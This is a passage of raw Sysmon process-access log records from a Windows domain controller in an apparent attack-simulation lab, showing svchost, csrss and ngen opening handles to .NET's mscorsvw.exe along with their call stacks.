rk64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.852{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0D02-000000009A01}4456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.836{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0D02-000000009A01}4456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.836{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0D02-000000009A01}4456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.774{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.774{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.774{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.711{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0B02-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.696{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0B02-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.696{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0B02-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.633{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0A02-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.617{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0A02-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.617{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0A02-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.571{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0902-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.555{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0902-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.555{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0902-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.492{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0802-000000009A01}1312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.492{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0802-000000009A01}1312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.492{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0802-000000009A01}1312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.446{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0702-000000009A01}1464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.430{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0702-000000009A01}1464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.430{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0702-000000009A01}1464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.383{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0602-000000009A01}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.367{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0602-000000009A01}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.367{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0602-000000009A01}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad